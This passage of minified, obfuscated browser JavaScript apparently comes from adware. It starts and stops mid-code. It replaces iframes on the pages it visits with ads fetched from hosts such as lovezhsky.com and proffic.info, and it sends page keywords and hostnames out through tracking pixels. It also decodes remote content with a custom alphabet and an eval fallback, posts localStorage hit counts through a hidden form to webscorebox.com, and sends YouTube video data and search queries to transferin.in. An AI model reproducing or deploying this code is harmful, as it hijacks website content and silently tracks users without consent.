p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a[b]);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e[b]&&void 0!==e[b]&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e[b]));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" \")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a<b},p2:function(a,b){return a>>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<<b},e4T:\"Co\",G7T:\"ch\",y2:function(a,b){return a|b},s4T:\"h\",i2:function(a,b){return a%b},C7T:4,Y7T:0,b2:function(a,b){return a|b},j7T:1,P2:function(a,b){return a<b},n7T:\"e\",f2:function(a,b){return a<b},B2:function(a,b){return a<b},A5:function(a,b){return a|b},X0:function(a,b){return a<b},U5:function(a,b){return a<\nb},m2:function(a,b){return a<b},z2:function(a,b){return a<b},A7T:\"r\",j4T:\"ar\",K2:function(a,b){return a|b},E7T:\"de\",K7T:15,N7T:\"a\",I0:function(a,b){return a<b},E0:function(){var a=function(a,b){var e=b&(352<(181,1206)?(93,65535):1268<=(197,48)?(70,24):(581,57));return((b-e)*a|((54,496)>=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n<l;n+=(22,78)<(311,193)?(334,4):6>(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return a<b},V7T:2,d9T:\"od\",F5:function(a,b){return a|b},E9T:\"A\",Q2:function(a,b){return a<b},H2:function(a,b){return a<b},r7T:\"d\",M2:function(a,b){return a|b},R0:function(a,b){return a==b},\nD5:function(a,b){return a&b}},isRvzFrame=function(a){try{return a instanceof HTMLIFrameElement&&a.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode.className&&\"string\"==typeof a.parentNode.parentNode.className&&1<a.parentNode.parentNode.className.length&&removeNode(a.parentNode.parentNode.className.split(\" \")[0])}catch(b){return!1}};window.adzy653rk={version:\"1.0\",nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"108\",\nhid:\"7073390709034079787\",prid:100,lt:\"132\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"Ir9UOElD\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),checkIfPartner:function(a){if(window.top==window)return isRvzFrame(a);\nvar b={_728x90:function(a){return a.parentElement&&a.parentElement.nextSibling&&a.parentElement.nextSibling.children&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0].innerHTML.match(/qa/)},_160_600:function(a){return a.parentElement&&a.parentElement.nextSibling&&\"String\"==typeof a.parentElement.nextSibling.innerHTML&&adzy653rk.regexExtTest.test(a.parentElement.nextSibling.innerHTML)},_625x250:function(a){return(a=a.getAttribute(\"style\"))?\na.match(/width:\\s?625px/)&&a.match(/width:\\s?250px/):!1},_345x600:function(a){return(a=a.getAttribute(\"style\"))?a.match(/width:\\s?345px/)&&a.match(/width:\\s?600px/):!1}},c;for(c in b)if(b[c](a))return!0;return!1},getKeywords:function(){var a=adzy653rk.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,d=b.length;c<d;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};\nfor(d=0;d<c.length;d++)try{var e=c[d].innerText;\"undefined\"==typeof e&&(e=c[d].textContent);for(var g=e.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\n\"l\")},isAncestor:function(a,b,c){function d(a){return\"object\"==typeof a&&a.top instanceof Window||/^\\s*\\[\\s*object\\s*Window\\s*\\]\\s*/.test(a+\"\")}c=c||30;return a==b?!0:!d(a)||!d(b)||b==window.top||0>=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.data||\"\")+\"\").indexOf(d+\"_IIIFAR\"))if(clearTimeout(c),window.removeEventListener(\"message\",h,!1),\n0==e.data.indexOf(d+\"_IIIFAR_\")){var g=b.l.decode(e.data.split(\"_\")[2]);a(!1,g)}else a(!0);else a(!0)}catch(k){a(!0)}};\"postMessage\"in window&&\"postMessage\"in(window.top||{})?(c=setTimeout(function(){window.document.removeEventListener(\"message\",h,!1);a(!0)},2E3),window.addEventListener(\"message\",h,!1),window.top.postMessage(b.l.encode(d+\"/\"+e+\"/\"+g)+\"_IIIFAR\",\"*\")):a(!0)},run:function(){adzy653rk.setMarker();var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var b=[],c=0;c<a.length;c++)stngs.checkif(a[c])||\nadzy653rk.checkIfPartner(a[c])||(a[c].setAttribute(adzy653rk.imp.rattr,\"true\"),a[c].setAttribute(\"replaced\",\"true\"),b.push(a[c]));if(b.length){var d=function(a){if(a>=b.length){var c=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+c.pid+\"&subid1=\"+c.hid+\"&subid2=\"+c.eid+\"&subid3=\"+c.prid+\"&lt=\"+c.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\n\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(c=adzy653rk.getAt(b[a]))(new PixelIPP).setParameter(\"size\",c).push(),adzy653rk.jbs.ifr.push(b[a]),adzy653rk.jbs.at.push(c);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},init:function(){var a=adzy653rk,b=typeof window;window.top===window?(a.listenForMessages(),a.run()):a.isAllowRunning(function(c,d){window.document.body.hasAttribute(\"data-\"+b)||(window.document.body.setAttribute(\"data-\"+\nb,c+\"\"),c&&a.run())})},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var b=function(c){c>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[c]&&adzy653rk.ifr[c]&&adzy653rk.ifr[c].src!=adzy653rk.src[c][0]&&!adzy653rk.checkIfPartner()&&adzy653rk.ifrset(adzy653rk.ifr[c],adzy653rk.src[c][1],1),setTimeout(function(){b(++c)},1))};b(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,\n1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.run,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var b=adzy653rk.imp.sizes,c=0;c<b.length;c++)if(a[0]>=b[c][0]-5&&a[0]<=b[c][0]+5&&a[1]>=b[c][1]-5&&a[1]<=b[c][1]+5)return b[c][2];return!1},getAds:function(a,b){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var c=\ndocument.createElement(\"script\");c.type=\"text/javascript\";c.src=a+\"&cb=adzy653rk.\"+b;try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(c)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[b](e.response)};e.send(null)}},seta:function(a){var b=[];try{var c=adzy653rk.l.decode(a),b=\"object\"==typeof JSON&&JSON.parse?JSON.parse(c):eval(c)}catch(d){}if(b instanceof\nArray)for(a=0;a<b.length;a++)b[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],b[a]);adzy653rk.destruct()},ifrset:function(a,b,c){c||(adzy653rk.ifr.push(a),b[0]=b[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(b[1]){case 1:a.src=b[0]+(-1<b[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+b[2]+\"_18x18_0\":\"\");break;case 2:a.src=\n\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+b[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+b[0]+d[1])}catch(g){}}c||adzy653rk.src.push([a.src,b])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),\ne=this.xlat.indexOf(a.charAt(c++)),g=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),f=(e&15)<<4|g>>2,l=(g&3)<<6|h,b=b+String.fromCharCode(d<<2|e>>4);64!=g&&0<f&&(b+=String.fromCharCode(f));64!=h&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)},_utf8_decode:function(a){for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt(c);if(128>d)b+=String.fromCharCode(d),c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+\n1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|g&63),c=c+3}return b},encode:function(a){a=this._utf8_encode(a);for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt(c++),e=a.charCodeAt(c++),g=a.charCodeAt(c++),h=d>>2,d=(d&3)<<4|e>>4,f=(e&15)<<2|g>>6,l=g&63;isNaN(e)?f=l=64:isNaN(g)&&(l=64);b=b+this.xlat.charAt(h)+this.xlat.charAt(d)+(64==f?\"=\":this.xlat.charAt(f))+(64==l?\"=\":this.xlat.charAt(l))}return b},_utf8_encode:function(a){if(a&&a.length){for(var b=\"\",c=0;c<a.length;c++){var d=\na.charCodeAt(c);128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}return a}}}};\nif( typeof adzy653rk !== \"undefined\")\n{adzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"enad.hanyibai.com ad.z5x.net satellitetvoffer.co ads.onimp03.com ad.yieldmanager.com fwwv.dixingwang.com cpm.cpc-ads.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net cpm.usabeautygame.com srv.aileronx.com ekda.xbhhh.com vqtm.nongchangwangzhan.com mthd.laorenmeng.com ads.exoclick.com servedby.adsplats.com ads.ad-maven.com ad.adnetwork.net cmne.197865.com owha.vancouverco.com ads.qadservice.com cdn.adk2.com Servedby.bigfineads.com a.ad-sys.com oeha.xbhhh.com s3-us-west-2.amazonaws.com ames.vancouverco.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info mdeh.xbhhh.com ad.improvemedianetwork.com zvmg.furongshangcheng.com cmen.197865.com ads.networkhm.com ads.impssrv.com media.glispa.com krea.laorenmeng.com tag.contextweb.com ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com khad.papace.com hnad.hanyibai.com nptv.nongchangwangzhan.com rtb-ads.avazu.net hend.vancouverco.com mpgs.xbhhh.com ads.ventivmedia.com ad.reachjunction.com pzez.nongchangwangzhan.com ads.mediawhite.com cdn.a2ggroup.com cdn.ad-maven.com syzf.xbhhh.com tala.intlsources.com an.z5x.net cemn.197865.com enfl.xbhhh.com fw.adsafeprotected.com cher.ehomestudy.com mtvn.dixingwang.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()}})()}catch(e){};try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"Ir9UOElD=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"Ir9UOElD=\")){var d=a.match(/Ir9UOElD=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ukchVWzmPhd9FrdYMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0qHa6rHr4rdCEpjaHqda6pjC5qE==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=126.5.81.2\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch(r){}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new 